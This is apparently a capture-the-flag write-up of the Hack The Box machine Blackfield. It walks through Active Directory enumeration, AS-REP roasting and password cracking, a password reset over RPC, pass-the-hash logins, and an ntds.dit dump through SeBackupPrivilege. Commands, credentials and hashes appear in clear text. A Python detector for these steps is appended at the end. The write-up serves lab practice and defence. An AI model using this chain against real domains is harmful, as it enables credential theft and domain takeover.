sudo nmap -p- -n --open -v 10.10.10.192
nmap -p 53,88,135,139,389,445,593,3268,49676 -sV -A -Pn 10.10.10.192
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 18:23:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h03m47s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-12T18:23:55
|_ start_date: N/A
Anonymous logon has no permission to run commands:
rpcclient -U "" -N 10.10.10.192
smbclient --no-pass -L //10.10.10.192/
After testing, only IPC$ allows an anonymous connection.
nmap -n -sV --script "ldap* and not brute" -Pn 10.10.10.192
The output is long; a few possibly useful items:
Domain name: BLACKFIELD.local
rootDomainNamingContext: DC=BLACKFIELD,DC=local ldapServiceName: BLACKFIELD.local:dc01$@BLACKFIELD.LOCAL
dnsHostName: DC01.BLACKFIELD.local
./kerbrute_linux_amd64 userenum -d BLACKFIELD.local --dc 10.10.10.192 /home/wuerror/Documents/SecLists-2021.3.1/Usernames/xato-net-10-million-usernames.txt
Two users found so far; let it keep running. Let's try support first.
impacket-GetNPUsers -no-pass -dc-ip 10.10.10.192 BLACKFIELD.local/support
john --wordlist=/usr/share/wordlists/rockyou.txt blacksupport.txt
john --show blacksupport.txt
We get the password #00^BlackKnight
psexec fails (no writable share) and wmiexec does not work either. Log in over RPC and continue information gathering:
rpcclient -U support%#00^BlackKnight 10.10.10.192
At the end of the list there are two more users, svc_backup and lydericlefebvre.
Now that we have the domain usernames, the brute force above can be stopped:
Administrator
Guest
krbtgt
audit2020
support
svc_backup
lydericlefebvre
AS-REP roast again: no new results, still only support.
Kerberoasting with the support account to obtain TGSs fails.
Log in to SMB as support:
smbmap -H 10.10.10.192 -d BLACKFIELD.local -u support -p '#00^BlackKnight'
smbclient //10.10.10.192/SYSVOL -U "support"%"#00^BlackKnight"
Pick the most suspicious share first and connect.
But in the end none of the readable shares gives any leads.
Following the walkthrough, analyze with BloodHound:
bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192
sudo neo4j console
bloodhound
After starting BloodHound, upload the generated JSON via Upload Data, then in Analysis choose Find AS-REP Roastable Users to locate the support user node.
Click the support node; under Node Info -> Outbound Control Rights -> First Degree Object Control there is one entry: support can reset the password of the audit2020 account.
We can reset the password over RPC:
net rpc password audit2020 -U support -S 10.10.10.192
or
rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 -c 'setuserinfo2 audit2020 23 "0xdf!!!"'
With the password reset to 0xdf!!!, check SMB again:
smbmap -H 10.10.10.192 -d BLACKFIELD.local -u audit2020 -p '0xdf!!!'
The forensic share is readable:
smbclient //10.10.10.192/forensic -U "audit2020"%'0xdf!!!'
Three folders. command_output holds several txt files of command output; in them we find that the administrators group also contains a user Ipwn3dYouCompany that we had not seen before.
memory holds an lsass.zip: download it and we can pull hashes from the dump. tools holds volatility and other utilities.
But the network is too slow to download it. I just looked in the walkthrough instead; let's pretend it was downloaded...
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Login succeeds.
notes.txt is found in the root of C:\:
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
whoami /priv
The account holds SeBackupPrivilege.
Put the following into diskshadow.txt; in short, it snapshots the C: drive and exposes the copy as a Z: drive that we can read, which lets us get at the ntds.dit file:
set context persistent nowriters
add volume c: alias pwn
create
expose %pwn% z:
Convert the file to DOS line endings and upload it:
unix2dos diskshadow.txt
mkdir c:\temp
cd c:\temp # all following commands are run from c:\temp to avoid the permission errors hit elsewhere
upload /home/wuerror/Downloads/temp/diskshadow.txt
diskshadow.exe /s .\diskshadow.txt
robocopy /b z:\windows\ntds . ntds.dit
reg save HKLM\SYSTEM c:\temp\system
download c:\temp\ntds.dit /home/wuerror/Downloads/temp/ntds.dit
download c:\temp\system /home/wuerror/Downloads/temp/system
Without an explicit destination path the download fails.
Then dump the hashes:
impacket-secretsdump -ntds ntds.dit -system system local |tee blackfield-hash.txt
Then take the administrator hash from the output:
evil-winrm -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192
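Every step of the final escalation (diskshadow creating a snapshot, robocopy /b copying ntds.dit, reg save exporting the SYSTEM hive) leaves a Security-log footprint when "Audit Sensitive Privilege Use" (event 4673) and process creation with command-line logging (event 4688) are enabled. The following is an added detection example, not code from the original post: it scores per-account rule hits over constructed event records whose field names follow the 4673/4688 event schemas. The sample events, the BackupAgentSvc allowlisted account and the thresholds are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed Security-log records (assumption: shaped like 4673/4688 event data, values invented).
SAMPLE_EVENTS = [
    {"EventID": 4673, "SubjectUserName": "svc_backup", "PrivilegeList": "SeBackupPrivilege",
     "ProcessName": "C:\\Windows\\System32\\diskshadow.exe"},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Windows\\System32\\diskshadow.exe",
     "CommandLine": "diskshadow.exe /s .\\diskshadow.txt"},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Windows\\System32\\Robocopy.exe",
     "CommandLine": "robocopy /b z:\\windows\\ntds . ntds.dit"},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\SYSTEM c:\\temp\\system"},
    # Legitimate backup agent using the privilege: suppressed via the allowlist.
    {"EventID": 4673, "SubjectUserName": "BackupAgentSvc", "PrivilegeList": "SeBackupPrivilege",
     "ProcessName": "C:\\Program Files\\BackupAgent\\agent.exe"},
    # Unrelated process creation: matches nothing.
    {"EventID": 4688, "SubjectUserName": "lydericlefebvre",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
]


def rule_hits(ev, backup_allowlist=frozenset()):
    """Return the detection rule names matched by one Security-log record."""
    hits = []
    eid = ev.get("EventID")
    user = ev.get("SubjectUserName", "").lower()
    allow = {a.lower() for a in backup_allowlist}

    # 4673: a sensitive privilege was used; SeBackupPrivilege by a non-allowlisted account
    if eid == 4673 and "sebackupprivilege" in ev.get("PrivilegeList", "").lower() and user not in allow:
        hits.append("sebackup_privilege_use")

    if eid == 4688:
        proc = ev.get("NewProcessName", "").lower()
        cmd = ev.get("CommandLine", "").lower()
        # shadow copy created from the command line
        if proc.endswith(("diskshadow.exe", "vssadmin.exe")):
            hits.append("shadow_copy_cli")
        # backup-mode copy (/b) that names the NTDS database
        if "robocopy" in proc and re.search(r"(^|\s)/b(\s|$)", cmd) and "ntds" in cmd:
            hits.append("ntds_backup_copy")
        # export of a hive needed to decrypt credential material
        if proc.endswith("reg.exe") and re.search(r"\bsave\s+hklm\\(system|sam|security)\b", cmd):
            hits.append("system_hive_save")
    return hits


def correlate(events, backup_allowlist=frozenset(), min_rules=2):
    """Group rule hits by account; report accounts that trip at least min_rules distinct rules."""
    per_user = defaultdict(set)
    for ev in events:
        for hit in rule_hits(ev, backup_allowlist):
            per_user[ev.get("SubjectUserName", "").lower()].add(hit)
    return {user: sorted(rules) for user, rules in per_user.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    for user, rules in correlate(SAMPLE_EVENTS, {"BackupAgentSvc"}).items():
        print(f"ALERT {user}: {', '.join(rules)}")
```

Any single rule here is noisy on a real backup server, which is why the alert is raised on the combination per account rather than per event: a shadow copy, a /b copy naming ntds and a SYSTEM hive export from the same user within a short window is the signature of an offline credential dump, whoever holds the privilege.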